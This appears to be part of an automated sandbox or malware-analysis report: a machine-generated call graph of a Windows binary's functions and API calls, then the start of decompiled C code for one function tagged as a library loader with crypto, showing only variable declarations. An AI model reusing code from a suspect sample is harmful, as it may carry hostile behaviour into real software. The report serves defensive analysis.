5883->5882 5888 eca6e1 __invoke_watson 10 API calls 5891 ec9659 5888->5891 5889 ecbc65 _strcat_s 65 API calls 5892 ec966d 5889->5892 5890 eca6e1 __invoke_watson 10 API calls 5890->5893 5891->5889 5894 ec967e 5892->5894 5896 eca6e1 __invoke_watson 10 API calls 5892->5896 5941 ecbc65 5893->5941 5950 ecbafc 5894->5950 5896->5894 5898 ec926e 5897->5898 5988 ec9243 GetModuleHandleW 5898->5988 5904 ecbfd4 5901->5904 5903 eca935 5903->5837 5903->5838 5904->5903 5905 ecbfeb Sleep 5904->5905 5991 ecd777 5904->5991 5906 ecc000 5905->5906 5906->5903 5906->5904 6021 eca8d1 LeaveCriticalSection 5907->6021 5909 eca9a9 5909->5839 5911 ecbe92 5910->5911 5912 ec9069 __mtinitlocknum 68 API calls 5911->5912 5913 ec96d4 5911->5913 5914 ecbeb5 5912->5914 5913->5858 5913->5859 5915 eca809 __calloc_impl 6 API calls 5914->5915 5915->5913 5917 ecbe2c 5916->5917 5918 ecbe33 5916->5918 5917->5918 5923 ecbe59 5917->5923 5919 ec9069 __mtinitlocknum 68 API calls 5918->5919 5920 ecbe38 5919->5920 5921 eca809 __calloc_impl 6 API calls 5920->5921 5922 ec959d 5921->5922 5922->5876 5925 eca6e1 5922->5925 5923->5922 5924 ec9069 __mtinitlocknum 68 API calls 5923->5924 5924->5920 5977 ecaa20 5925->5977 5927 eca70e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5928 eca7de __invoke_watson 5927->5928 5929 eca7ea GetCurrentProcess TerminateProcess 5927->5929 5928->5929 5979 eccec4 5929->5979 5931 ec95ae 5931->5876 5937 ecbceb 5932->5937 5933 ecbcef 5934 ec9069 __mtinitlocknum 68 API calls 5933->5934 5935 ec9622 5933->5935 5936 ecbd0b 5934->5936 5935->5890 5935->5893 5938 eca809 __calloc_impl 6 API calls 5936->5938 5937->5933 5937->5935 5939 ecbd35 5937->5939 5938->5935 5939->5935 5940 ec9069 __mtinitlocknum 68 API calls 5939->5940 5940->5936 5942 ecbc7d 5941->5942 5945 ecbc76 5941->5945 5943 ec9069 __mtinitlocknum 68 API calls 5942->5943 5944 ecbc82 5943->5944 5946 eca809 __calloc_impl 6 API calls 5944->5946 5945->5942 5948 ecbcb1 5945->5948 5947 ec9648 5946->5947 5947->5888 5947->5891 5948->5947 5949 ec9069 __mtinitlocknum 68 API calls 5948->5949 5949->5944 5951 ec9ef9 _raise 7 API calls 5950->5951 5952 ecbb0c 5951->5952 5953 ecbb1f LoadLibraryA 5952->5953 5955 ecbba7 5952->5955 5954 ecbb34 GetProcAddress 5953->5954 5966 ecbc49 5953->5966 5956 ecbb4a 5954->5956 5954->5966 5959 ec9f02 __decode_pointer 6 API calls 5955->5959 5973 ecbbd1 5955->5973 5960 ec9e87 __encode_pointer 7 API calls 5956->5960 5957 ec9f02 __decode_pointer 6 API calls 5957->5966 5958 ec9f02 __decode_pointer 6 API calls 5967 ecbc14 5958->5967 5961 ecbbc4 5959->5961 5962 ecbb50 GetProcAddress 5960->5962 5963 ec9f02 __decode_pointer 6 API calls 5961->5963 5964 ec9e87 __encode_pointer 7 API calls 5962->5964 5963->5973 5965 ecbb65 GetProcAddress 5964->5965 5968 ec9e87 __encode_pointer 7 API calls 5965->5968 5966->5897 5972 ec9f02 __decode_pointer 6 API calls 5967->5972 5975 ecbbfc 5967->5975 5969 ecbb7a GetProcAddress 5968->5969 5970 ec9e87 __encode_pointer 7 API calls 5969->5970 5971 ecbb8f 5970->5971 5971->5955 5974 ecbb99 GetProcAddress 5971->5974 5972->5975 5973->5958 5973->5975 5976 ec9e87 __encode_pointer 7 API calls 5974->5976 5975->5957 5976->5955 5978 ecaa2c __VEC_memzero 5977->5978 5978->5927 5980 eccecc 5979->5980 5981 eccece IsDebuggerPresent 5979->5981 5980->5931 5987 ecd027 5981->5987 5984 ece607 SetUnhandledExceptionFilter UnhandledExceptionFilter 5985 ece62c GetCurrentProcess TerminateProcess 5984->5985 5986 ece624 __invoke_watson 5984->5986 5985->5931 5986->5985 5987->5984 5989 ec9267 ExitProcess 5988->5989 5990 ec9257 GetProcAddress 5988->5990 5990->5989 5992 ecd82a 5991->5992 5998 ecd789 5991->5998 5993 eca9ed __calloc_impl 6 API calls 5992->5993 5994 ecd830 5993->5994 5996 ec9069 __mtinitlocknum 67 API calls 5994->5996 5995 ec96cd __FF_MSGBANNER 67 API calls 6002 ecd79a 5995->6002 5997 ecd822 5996->5997 5997->5904 5998->5997 6001 ecd7e6 RtlAllocateHeap 5998->6001 5998->6002 6004 ecd816 5998->6004 6005 eca9ed __calloc_impl 6 API calls 5998->6005 6007 ecd81b 5998->6007 6009 ecd728 5998->6009 5999 ec9522 __NMSG_WRITE 67 API calls 5999->6002 6001->5998 6002->5995 6002->5998 6002->5999 6003 ec926e __mtinitlocknum 3 API calls 6002->6003 6003->6002 6006 ec9069 __mtinitlocknum 67 API calls 6004->6006 6005->5998 6006->6007 6008 ec9069 __mtinitlocknum 67 API calls 6007->6008 6008->5997 6011 ecd734 __mtinitlocknum 6009->6011 6010 ecd765 __mtinitlocknum 6010->5998 6011->6010 6012 eca9ab __lock 68 API calls 6011->6012 6013 ecd74a 6012->6013 6014 ecb279 ___sbh_alloc_block 5 API calls 6013->6014 6015 ecd755 6014->6015 6017 ecd76e 6015->6017 6020 eca8d1 LeaveCriticalSection 6017->6020 6019 ecd775 6019->6010 6020->6019 6021->5909 6023 ecae27 HeapAlloc 6022->6023 6024 ecadf3 HeapReAlloc 6022->6024 6025 ecae4a VirtualAlloc 6023->6025 6026 ecae11 6023->6026 6024->6026 6027 ecae15 6024->6027 6025->6026 6028 ecae64 HeapFree 6025->6028 6026->5771 6027->6023 6028->6026 6030 ecaea7 VirtualAlloc 6029->6030 6032 ecaeee 6030->6032 6032->5775 6033->5778 6034->5706 6053 eca8d1 LeaveCriticalSection 6035->6053 6037 eca085 6037->5716 6039 ecc59c InterlockedIncrement 6038->6039 6040 ecc59f 6038->6040 6039->6040 6041 ecc5ac 6040->6041 6042 ecc5a9 InterlockedIncrement 6040->6042 6043 ecc5b9 6041->6043 6044 ecc5b6 InterlockedIncrement 6041->6044 6042->6041 6045 ecc5c3 InterlockedIncrement 6043->6045 6047 ecc5c6 6043->6047 6044->6043 6045->6047 6046 ecc5df InterlockedIncrement 6046->6047 6047->6046 6048 ecc5ef InterlockedIncrement 6047->6048 6049 ecc5fa InterlockedIncrement 6047->6049 6048->6047 6049->5719 6054 eca8d1 LeaveCriticalSection 6050->6054 6052 eca0d3 6052->5721 6053->6037 6054->6052 6055->5600 6057 ecbf6d 6056->6057 6058 ecbf74 6056->6058 6057->6058 6062 ecbfa0 6057->6062 6059 ec9069 __mtinitlocknum 68 API calls 6058->6059 6064 ecbf79 6059->6064 6060 eca809 __calloc_impl 6 API calls 6061 ecbf88 6060->6061 6061->5629 6062->6061 6063 ec9069 __mtinitlocknum 68 API calls 6062->6063 6063->6064 6064->6060 6066 ecb6ec 6065->6066 6067 ec9e87 __encode_pointer 7 API calls 6066->6067 6068 ecb704 6066->6068 6067->6066 6068->5639 6072 ecb693 6069->6072 6071 ecb6dc 6071->5641 6073 ecb69f __mtinitlocknum 6072->6073 6080 ec9286 6073->6080 6079 ecb6c0 __mtinitlocknum 6079->6071 6081 eca9ab __lock 68 API calls 6080->6081 6082 ec928d 6081->6082 6083 ecb5a8 6082->6083 6084 ec9f02 __decode_pointer 6 API calls 6083->6084 6085 ecb5bc 6084->6085 6086 ec9f02 __decode_pointer 6 API calls 6085->6086 6087 ecb5cc 6086->6087 6095 ecb64f 6087->6095 6103 ecd65c 6087->6103 6089 ecb5ea 6092 ecb60e 6089->6092 6099 ecb636 6089->6099 6116 ecc05c 6089->6116 6090 ec9e87 __encode_pointer 7 API calls 6091 ecb644 6090->6091 6093 ec9e87 __encode_pointer 7 API calls 6091->6093 6092->6095 6096 ecc05c __realloc_crt 74 API calls 6092->6096 6097 ecb624 6092->6097 6093->6095 6100 ecb6c9 6095->6100 6096->6097 6097->6095 6098 ec9e87 __encode_pointer 7 API calls 6097->6098 6098->6099 6099->6090 6165 ec928f 6100->6165 6104 ecd668 __mtinitlocknum 6103->6104 6105 ecd678 6104->6105 6106 ecd695 6104->6106 6108 ec9069 __mtinitlocknum 68 API calls 6105->6108 6107 ecd6d6 HeapSize 6106->6107 6110 eca9ab __lock 68 API calls 6106->6110 6112 ecd68d __mtinitlocknum 6107->6112 6109 ecd67d 6108->6109 6111 eca809 __calloc_impl 6 API calls 6109->6111 6113 ecd6a5 ___sbh_find_block 6110->6113 6111->6112 6112->6089 6121 ecd6f6 6113->6121 6118 ecc065 6116->6118 6119 ecc0a4 6118->6119 6120 ecc085 Sleep 6118->6120 6125 ecd841 6118->6125 6119->6092 6120->6118 6124 eca8d1 LeaveCriticalSection 6121->6124 6123 ecd6d1 6123->6107 6123->6112 6124->6123 6126 ecd84d __mtinitlocknum 6125->6126 6127 ecd854 6126->6127 6128 ecd862 6126->6128 6129 ecd777 _malloc 68 API calls 6127->6129 6130 ecd869 6128->6130 6131 ecd875 6128->6131 6146 ecd85c _realloc __mtinitlocknum 6129->6146 6132 ecbece __mtinitlocknum 68 API calls 6130->6132 6140 ecd9e7 6131->6140 6158 ecd882 ___sbh_resize_block _realloc ___sbh_find_block 6131->6158 6132->6146 6133 ecda1a 6134 eca9ed __calloc_impl 6 API calls 6133->6134 6137 ecda20 6134->6137 6135 eca9ab __lock 68 API calls 6135->6158 6136 ecd9ec HeapReAlloc 6136->6140 6136->6146 6138 ec9069 __mtinitlocknum 68 API calls 6137->6138 6138->6146 6139 ecda3e 6142 ec9069 __mtinitlocknum 68 API calls 6139->6142 6139->6146 6140->6133 6140->6136 6140->6139 6141 eca9ed __calloc_impl 6 API calls 6140->6141 6145 ecda34 6140->6145 6141->6140 6144 ecda47 GetLastError 6142->6144 6144->6146 6147 ec9069 __mtinitlocknum 68 API calls 6145->6147 6146->6118 6149 ecd9b5 6147->6149 6148 ecd90d HeapAlloc 6148->6158 6149->6146 6151 ecd9ba GetLastError 6149->6151 6150 ecd962 HeapReAlloc 6150->6158 6151->6146 6152 ecb279 ___sbh_alloc_block 5 API calls 6152->6158 6153 ecd9cd 6153->6146 6155 ec9069 __mtinitlocknum 68 API calls 6153->6155 6154 eca9ed __calloc_impl 6 API calls 6154->6158 6156 ecd9da 6155->6156 6156->6144 6156->6146 6157 ecd9b0 6159 ec9069 __mtinitlocknum 68 API calls 6157->6159 6158->6133 6158->6135 6158->6146 6158->6148 6158->6150 6158->6152 6158->6153 6158->6154 6158->6157 6160 ecaaca VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 6158->6160 6161 ecd985 6158->6161 6159->6149 6160->6158 6164 eca8d1 LeaveCriticalSection 6161->6164 6163 ecd98c 6163->6158 6164->6163 6168 eca8d1 LeaveCriticalSection 6165->6168 6167 ec9296 6167->6079 6168->6167 6170 ec7a49 6169->6170 6173 ec35e0 6170->6173 6172 ec7b24 6172->5653 6184 ec381e _memset 6173->6184 6174 ec56d5 SetLastError GetLastError 6175 ec58df HeapCreate 6174->6175 6189 ec56f2 6174->6189 6178 ec5952 6175->6178 6176 ec5514 6176->6174 6182 ec598e GetProcAddress 6178->6182 6179 ec3cf4 GetProcAddress 6215 ec1190 6179->6215 6180 ec5892 GetConsoleCP GetLastError 6180->6175 6180->6189 6185 ec7878 6182->6185 6186 ec5a92 Sleep RtlAllocateHeap 6182->6186 6184->6176 6184->6179 6185->6172 6193 ec5ba8 6186->6193 6187 ec3d5a 6188 ec3d95 CoInitialize 6187->6188 6192 ec3db2 6188->6192 6197 ec4ee1 6188->6197 6189->6180 6190 ec588b SetLastError 6189->6190 6190->6180 6195 ec3e8a GetThreadUILanguage 6192->6195 6196 ec3e9f 6192->6196 6193->6185 6217 ec8e37 6193->6217 6195->6196 6198 ec400e TlsGetValue 6196->6198 6197->6176 6199 ec53a9 GetProcAddress 6197->6199 6205 ec4052 6198->6205 6199->6197 6201 ec5412 Sleep 6199->6201 6202 ec5442 OutputDebugStringW 6201->6202 6202->6176 6204 ec5cd2 6204->6172 6206 ec4710 GetSystemDefaultLangID 6205->6206 6208 ec472e 6206->6208 6207 ec48f3 IsZoomed 6207->6208 6208->6207 6209 ec4b9d 6208->6209 6210 ec4df9 FoldStringW 6209->6210 6211 ec4e39 6210->6211 6212 ec4eb3 6210->6212 6213 ec4ed6 CoUninitialize 6211->6213 6214 ec4e57 CoUninitialize 6211->6214 6212->6213 6213->6176 6214->6176 6216 ec1336 KiUserExceptionDispatcher 6215->6216 6216->6187 6216->6188 6218 ec907c __calloc_impl 68 API calls 6217->6218 6219 ec8e51 6218->6219 6220 ec8e6d 6219->6220 6221 ec9069 __mtinitlocknum 68 API calls 6219->6221 6220->6204 6222 ec8e64 6221->6222 6222->6220 6223 ec9069 __mtinitlocknum 68 API calls 6222->6223 6223->6220 6225 ec936a __mtinitlocknum 6224->6225 6226 eca9ab __lock 68 API calls 6225->6226 6227 ec9371 6226->6227 6230 ec9f02 __decode_pointer 6 API calls 6227->6230 6234 ec942a __initterm 6227->6234 6232 ec93a8 6230->6232 6231 ec9472 __mtinitlocknum 6231->5673 6232->6234 6236 ec9f02 __decode_pointer 6 API calls 6232->6236 6241 ec9475 6234->6241 6235 ec9469 6237 ec926e __mtinitlocknum 3 API calls 6235->6237 6240 ec93bd 6236->6240 6237->6231 6238 ec9ef9 7 API calls _raise 6238->6240 6239 ec9f02 6 API calls __decode_pointer 6239->6240 6240->6234 6240->6238 6240->6239 6242 ec947b 6241->6242 6243 ec9456 6241->6243 6246 eca8d1 LeaveCriticalSection 6242->6246 6243->6231 6245 eca8d1 LeaveCriticalSection 6243->6245 6245->6235 6246->6243 6664 ecb662 6665 ecc010 __calloc_crt 68 API calls 6664->6665 6666 ecb66e 6665->6666 6667 ec9e87 __encode_pointer 7 API calls 6666->6667 6668 ecb676 6667->6668 6904 ec6023 6905 ec6025 TlsGetValue 6904->6905 6908 ec62e2 6905->6908 6907 ec7878 6908->6907 6909 ec7867 GetForegroundWindow MessageBoxW 6908->6909 6909->6907 6251 ecd6ff 6252 ec921a __amsg_exit 68 API calls 6251->6252 6253 ecd706 6252->6253 5505 ec9ef9 5508 ec9e87 TlsGetValue 5505->5508 5509 ec9e9f 5508->5509 5510 ec9ec0 GetModuleHandleW 5508->5510 5509->5510 5511 ec9ea9 TlsGetValue 5509->5511 5512 ec9edb GetProcAddress 5510->5512 5513 ec9ed0 5510->5513 5517 ec9eb4 5511->5517 5519 ec9eb8 5512->5519 5520 ec91ea 5513->5520 5515 ec9eeb RtlEncodePointer 5516 ec9ef3 5515->5516 5517->5510 5517->5519 5519->5515 5519->5516 5521 ec91f5 Sleep GetModuleHandleW 5520->5521 5522 ec9217 5521->5522 5523 ec9213 5521->5523 5522->5512 5522->5516 5523->5521 5523->5522 6677 ec8c7b 6678 ec8c80 6677->6678 6679 ec8e08 6678->6679 6680 ec8df7 GetACP 6678->6680 6681 ec78c0 90 API calls 6679->6681 6680->6679 6682 ec8e0d 6681->6682 6683 ec9f74 TlsAlloc 6684 ece777 6691 ecca24 6684->6691 6690 ece798 6692 ecca37 6691->6692 6698 ecca84 6691->6698 6693 eca14e __getptd 68 API calls 6692->6693 6694 ecca3c 6693->6694 6695 ecca64 6694->6695 6707 ecc6e4 6694->6707 6695->6698 6722 ecc980 6695->6722 6698->6690 6699 ece85c 6698->6699 6700 ecca24 _LocaleUpdate::_LocaleUpdate 78 API calls 6699->6700 6701 ece7c0 6700->6701 6702 ece0c2 6701->6702 6703 ecca24 _LocaleUpdate::_LocaleUpdate 78 API calls 6702->6703 6704 ece0d5 6703->6704 6754 ecdf08 6704->6754 6708 ecc6f0 __mtinitlocknum 6707->6708 6709 eca14e __getptd 68 API calls 6708->6709 6710 ecc6f5 6709->6710 6711 ecc723 6710->6711 6713 ecc707 6710->6713 6712 eca9ab __lock 68 API calls 6711->6712 6715 ecc72a 6712->6715 6714 eca14e __getptd 68 API calls 6713->6714 6716 ecc70c 6714->6716 6738 ecc6a6 6715->6738 6719 ecc71a __mtinitlocknum 6716->6719 6721 ec921a __amsg_exit 68 API calls 6716->6721 6719->6695 6721->6719 6723 ecc98c __mtinitlocknum 6722->6723 6724 eca14e __getptd 68 API calls 6723->6724 6725 ecc991 6724->6725 6726 eca9ab __lock 68 API calls 6725->6726 6728 ecc9a3 6725->6728 6727 ecc9c1 6726->6727 6729 ecca0a 6727->6729 6731 ecc9d8 InterlockedDecrement 6727->6731 6732 ecc9f2 InterlockedIncrement 6727->6732 6730 ecc9b1 __mtinitlocknum 6728->6730 6734 ec921a __amsg_exit 68 API calls 6728->6734 6750 ecca1b 6729->6750 6730->6698 6731->6732 6735 ecc9e3 6731->6735 6732->6729 6734->6730 6735->6732 6736 ecbece __mtinitlocknum 68 API calls 6735->6736 6737 ecc9f1 6736->6737 6737->6732 6739 ecc6aa 6738->6739 6740 ecc6dc 6738->6740 6739->6740 6741 ecc57e ___addlocaleref 8 API calls 6739->6741 6746 ecc74e 6740->6746 6742 ecc6bd 6741->6742 6742->6740 6743 ecc60d ___removelocaleref 8 API calls 6742->6743 6744 ecc6c8 6743->6744 6744->6740 6745 ecc435 ___freetlocinfo 68 API calls 6744->6745 6745->6740 6749 eca8d1 LeaveCriticalSection 6746->6749 6748 ecc755 6748->6716 6749->6748 6753 eca8d1 LeaveCriticalSection 6750->6753 6752 ecca22 6752->6728 6753->6752 6755 ecdf29 GetStringTypeW 6754->6755 6756 ecdf54 6754->6756 6757 ecdf49 GetLastError 6755->6757 6758 ecdf41 6755->6758 6756->6758 6759 ece03b 6756->6759 6757->6756 6760 ecdf8d MultiByteToWideChar 6758->6760 6777 ece035 6758->6777 6782 ece8aa GetLocaleInfoA 6759->6782 6766 ecdfba 6760->6766 6760->6777 6762 eccec4 __crtGetStringTypeA_stat 5 API calls 6764 ece0c0 6762->6764 6764->6690 6765 ecdfcf _memset 6769 ece008 MultiByteToWideChar 6765->6769 6765->6777 6766->6765 6771 ecd777 _malloc 68 API calls 6766->6771 6767 ece08c GetStringTypeA 6770 ece0a7 6767->6770 6767->6777 6773 ece01e GetStringTypeW 6769->6773 6774 ece02f 6769->6774 6775 ecbece __mtinitlocknum 68 API calls 6770->6775 6771->6765 6773->6774 6778 ecd708 6774->6778 6775->6777 6777->6762 6779 ecd714 6778->6779 6780 ecd725 6778->6780 6779->6780 6781 ecbece __mtinitlocknum 68 API calls 6779->6781 6780->6777 6781->6780 6783 ece8d8 ___ansicp 6782->6783 6784 eccec4 __crtGetStringTypeA_stat 5 API calls 6783->6784 6785 ece05f 6784->6785 6785->6767 6785->6777 6786 ece8f3 6785->6786 6787 ece933 GetCPInfo 6786->6787 6792 ece9bd 6786->6792 6788 ece9a8 MultiByteToWideChar 6787->6788 6789 ece94a 6787->6789 6788->6792 6795 ece963 _strlen 6788->6795 6789->6788 6790 ece950 GetCPInfo 6789->6790 6790->6788 6793 ece95d 6790->6793 6791 eccec4 __crtGetStringTypeA_stat 5 API calls 6796 ece080 6791->6796 6792->6791 6793->6788 6793->6795 6794 ece995 _memset 6794->6792 6798 ece9f2 MultiByteToWideChar 6794->6798 6795->6794 6797 ecd777 _malloc 68 API calls 6795->6797 6796->6767 6796->6777 6797->6794 6799 ecea29 6798->6799 6800 ecea0a 6798->6800 6801 ecd708 __freea 68 API calls 6799->6801 6802 ecea2e 6800->6802 6803 ecea11 WideCharToMultiByte 6800->6803 6801->6792 6804 ecea4d 6802->6804 6805 ecea39 WideCharToMultiByte 6802->6805 6803->6799 6806 ecc010 __calloc_crt 68 API calls 6804->6806 6805->6799 6805->6804 6807 ecea55 6806->6807 6807->6799 6808 ecea5e WideCharToMultiByte 6807->6808 6808->6799 6809 ecea70 6808->6809 6810 ecbece __mtinitlocknum 68 API calls 6809->6810 6810->6799 6301 eca4b0 6302 eca4dc 6301->6302 6303 eca4e9 6301->6303 6304 eccec4 __crtGetStringTypeA_stat 5 API calls 6302->6304 6305 eccec4 __crtGetStringTypeA_stat 5 API calls 6303->6305 6304->6303 6307 eca4f9 __except_handler4 __IsNonwritableInCurrentImage 6305->6307 6306 eca57c 6307->6306 6308 eca552 __except_handler4 6307->6308 6317 eccff6 RtlUnwind 6307->6317 6308->6306 6309 eca56c 6308->6309 6310 eccec4 __crtGetStringTypeA_stat 5 API calls 6308->6310 6311 eccec4 __crtGetStringTypeA_stat 5 API calls 6309->6311 6310->6309 6311->6306 6313 eca5cb __except_handler4 6314 eca5ff 6313->6314 6315 eccec4 __crtGetStringTypeA_stat 5 API calls 6313->6315 6316 eccec4 __crtGetStringTypeA_stat 5 API calls 6314->6316 6315->6314 6316->6308 6317->6313 6254 ec5bca 6256 ec5bec 6254->6256 6255 ec7878 6256->6255 6257 ec8e37 _calloc 68 API calls 6256->6257 6258 ec5cd2 6257->6258 6259 ec8fca 6262 ec9707 6259->6262 6261 ec8fdb 6263 eca0d5 __getptd_noexit 68 API calls 6262->6263 6264 ec9714 6263->6264 6264->6261 6264->6264 6817 ece640 RtlUnwind 6332 ecb582 6333 ecb585 6332->6333 6336 ecd545 6333->6336 6337 ecd564 6336->6337 6340 ecd56b 6336->6340 6339 ec9522 __NMSG_WRITE 68 API calls 6337->6339 6339->6340 6348 ecb8b2 6340->6348 6342 ecd57c _memset 6344 ecd654 6342->6344 6346 ecd614 SetUnhandledExceptionFilter UnhandledExceptionFilter 6342->6346 6345 ec94a0 _raise 68 API calls 6344->6345 6347 ecd65b 6345->6347 6346->6344 6349 ec9f02 __decode_pointer 6 API calls 6348->6349 6350 ecb8bd 6349->6350 6350->6342 6351 ecb8bf 6350->6351 6354 ecb8cb __mtinitlocknum 6351->6354 6352 ecb927 6353 ecb908 6352->6353 6358 ecb936 6352->6358 6357 ec9f02 __decode_pointer 6 API calls 6353->6357 6354->6352 6354->6353 6355 ecb8f2 6354->6355 6361 ecb8ee 6354->6361 6356 eca0d5 __getptd_noexit 68 API calls 6355->6356 6359 ecb8f7 _siglookup 6356->6359 6357->6359 6360 ec9069 __mtinitlocknum 68 API calls 6358->6360 6363 ecb99d 6359->6363 6365 ec94a0 _raise 68 API calls 6359->6365 6371 ecb900 __mtinitlocknum 6359->6371 6362 ecb93b 6360->6362 6361->6355 6361->6358 6364 eca809 __calloc_impl 6 API calls 6362->6364 6366 eca9ab __lock 68 API calls 6363->6366 6368 ecb9a8 6363->6368 6364->6371 6365->6363 6366->6368 6367 ec9ef9 _raise 7 API calls 6369 ecb9dd 6367->6369 6368->6367 6368->6369 6372 ecba33 6369->6372 6371->6342 6373 ecba39 6372->6373 6374 ecba40 6372->6374 6376 eca8d1 LeaveCriticalSection 6373->6376 6374->6371 6376->6374 6269 ec91dc SetUnhandledExceptionFilter 6920 ec901d 6923 eca63c 6920->6923 6922 ec9022 6922->6922 6924 eca66e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 6923->6924 6925 eca661 6923->6925 6926 eca665 6924->6926 6925->6924 6925->6926 6926->6922 6270 ec8fde 6271 ec8fed 6270->6271 6272 ec8ff3 6270->6272 6276 ec94a0 6271->6276 6279 ec94c5 6272->6279 6275 ec8ff8 __mtinitlocknum 6277 ec935e _doexit 68 API calls 6276->6277 6278 ec94b1 6277->6278 6278->6272 6280 ec935e _doexit 68 API calls 6279->6280 6281 ec94d0 6280->6281 6281->6275 6818 ece858 6819 ece86f 6818->6819 6820 ecca24 _LocaleUpdate::_LocaleUpdate 78 API calls 6818->6820 6820->6819 6377 ec3f9a 6378 ec3f35 6377->6378 6379 ec400e TlsGetValue 6378->6379 6380 ec4052 6379->6380 6381 ec4710 GetSystemDefaultLangID 6380->6381 6383 ec472e 6381->6383 6382 ec48f3 IsZoomed 6382->6383 6383->6382 6384 ec4b9d 6383->6384 6385 ec4df9 FoldStringW 6384->6385 6386 ec4e39 6385->6386 6387 ec4eb3 6385->6387 6388 ec4ed6 CoUninitialize 6386->6388 6389 ec4e57 CoUninitialize 6386->6389 6387->6388 6392 ec5514 6388->6392 6389->6392 6390 ec56d5 SetLastError GetLastError 6391 ec58df HeapCreate 6390->6391 6399 ec56f2 6390->6399 6394 ec5952 6391->6394 6392->6390 6396 ec598e GetProcAddress 6394->6396 6395 ec5892 GetConsoleCP GetLastError 6395->6391 6395->6399 6397 ec7878 6396->6397 6398 ec5a92 Sleep RtlAllocateHeap 6396->6398 6402 ec5ba8 6398->6402 6399->6395 6400 ec588b SetLastError 6399->6400 6400->6395 6402->6397 6403 ec8e37 _calloc 68 API calls 6402->6403 6404 ec5cd2 6403->6404 6405 ec919a 6406 ec91d6 6405->6406 6407 ec91ac 6405->6407 6407->6406 6409 ecb55e 6407->6409 6410 ecb56a __mtinitlocknum 6409->6410 6415 eca14e 6410->6415 6413 ecd545 _abort 70 API calls 6414 ecb591 __mtinitlocknum 6413->6414 6414->6406 6416 eca0d5 __getptd_noexit 68 API calls 6415->6416 6417 eca156 6416->6417 6418 eca163 6417->6418 6419 ec921a __amsg_exit 68 API calls 6417->6419 6418->6413 6419->6418 6286 ecbad4 6287 ecbae0 SetLastError 6286->6287 6288 ecbae8 __mtinitlocknum 6286->6288 6287->6288 6293 ec67d1 6295 ec677c 6293->6295 6294 ec7878 6295->6294 6296 ec7867 GetForegroundWindow MessageBoxW 6295->6296 6296->6294

                                              Executed Functions

                                              Function 00EC35E0 Relevance: 74.3, APIs: 23, Strings: 18, Instructions: 2591libraryloaderCOMMONCrypto
                                              Download Yara Rule
                                              C-Code - Quality: 83%
                                              			E00EC35E0(signed int __edx) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v8;
				signed int _v9;
				signed int _v10;
				signed int _v11;
				signed int _v12;
				signed int _v13;
				signed int _v14;
				signed int _v15;
				signed int _v16;
				signed int _v17;
				signed int _v18;
				signed int _v19;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				long _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v184;
				signed int _v188;
				long _v192;
				signed int _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				long _v212;
				char _v214;
				char _v215;
				char _v216;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				char _v281;
				char _v282;
				char _v283;
				char _v284;
				char _v285;
				char _v286;
				char _v287;
				char _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				char _v293;
				char _v294;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				char _v302;
				char _v303;
				char _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				char _v332;
				short _v334;
				char _v340;
				short _v344;
				char _v356;
				signed int _v361;
				char _v362;
				short _v364;
				char _v368;
				char _v372;
				char _v376;
				short _v380;
				char _v404;
				long _v408;
				char _v432;
				short _v438;
				short _v532;
				char _v2578;
				short _v2580;
				signed int __edi;
				signed int _t1420;
				signed char _t1422;
				signed short _t1423;
				signed int _t1425;
				signed int _t1429;
				signed int _t1446;
				signed int _t1452;
				signed int _t1455;
				intOrPtr _t1456;
				signed int _t1461;
				void* _t1466;
				void* _t1468;
				signed int _t1469;
				signed short _t1475;
				signed char _t1476;
				signed int _t1477;
				signed short _t1481;
				signed int _t1483;
				signed int _t1487;
				signed int _t1490;
				signed int _t1494;
				signed int _t1496;
				signed short _t1499;
				signed int _t1501;
				signed char _t1506;
				WCHAR* _t1509;
				signed int _t1540;
				signed int _t1547;
				signed int _t1548;
				signed char _t1556;
				signed int _t1558;
				signed int _t1559;
				signed int _t1560;
				void* _t1561;
				signed int _t1569;
				char _t1577;
				char _t1578;
				void* _t1603;
				signed int _t1611;
				signed int _t1612;
				signed int _t1613;
				signed short _t1614;
				void* _t1624;
				signed int _t1629;
				signed short _t1630;
				signed int _t1635;
				signed short _t1660;
				signed short _t1661;
				signed int _t1671;
				signed int _t1672;
				void* _t1680;
				void* _t1692;
				signed int _t1693;
				signed int _t1695;
				signed int _t1698;
				signed short _t1701;
				signed int _t1705;
				signed int _t1711;
				signed int _t1712;
				signed int _t1713;
				signed int _t1715;
				signed int _t1718;
				signed short _t1719;
				signed int _t1721;
				signed int _t1724;
				void* _t1730;
				signed char _t1736;
				signed short _t1744;
				signed short _t1760;
				signed int _t1770;
				signed int _t1774;
				signed int _t1776;
				signed int _t1778;
				signed short _t1779;
				signed int _t1785;
				signed int _t1809;
